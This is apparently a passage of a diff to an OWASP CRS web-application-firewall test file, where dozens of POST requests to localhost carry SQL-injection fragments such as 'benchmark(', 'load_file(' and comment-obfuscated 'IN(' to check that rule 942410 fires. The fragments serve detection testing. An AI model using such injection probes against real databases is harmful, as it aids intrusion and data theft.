text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-112 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=values+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-113 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=VALUES%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-114 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=version%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-115 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=version%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-116 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xmltype%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-117 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=XMLType%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-118 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=year%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" + - test_id: 1 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ABS(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "benchmark(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 3 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENChmARk(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 4 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cast(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 5 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CAST(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 6 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "char(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 7 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "chaR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 8 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "chr(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 9 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CHR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 10 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COALESCE(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 11 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Compress (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 12 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "concat (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 13 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cOnCaT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 14 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "concat_ws(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 15 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "convert(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 16 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cOnVeRt(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 17 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COS(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 18 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COUNT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 19 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CURRENT_USER(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 20 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "database (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 21 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "date(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 22 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=date%5D%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 23 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=day.+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 24 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=day%26%27%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 25 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=decode%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 26 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=default%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 27 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ELT%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 28 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=encode%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 29 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ExtractValue%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 30 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=EXTRACTVALUE%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 31 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=floor%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 32 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FLOOR+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 33 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=format%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 34 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=GROUP_CONCAT%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 35 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=hex%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 36 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=hEx%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 37 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if+%21%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 38 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 39 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 40 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if%5C%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 41 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IFNULL%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 42 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=in+%27%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 43 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IN+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 44 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IN%2F%2A%2A%2F%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 45 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=insert%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 46 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=left%27%29%3F%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 47 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=LEFT%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 48 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%7C%7C%21%21%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 49 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%7C%7C%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 50 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%3F%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 51 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%26%26%21%21%21%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 52 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%26%26%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 53 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=LENGTH%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 54 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ln+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 55 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ln%29+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 56 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=load_file%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 57 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=local%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 58 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=log%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 59 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=log%26%26%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 60 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=lower%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 61 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MAKE_SET%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 62 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MAX%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 63 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=md5%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 64 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=md5%5C%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 65 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MID%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 66 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=minute+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 67 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=month%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 68 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 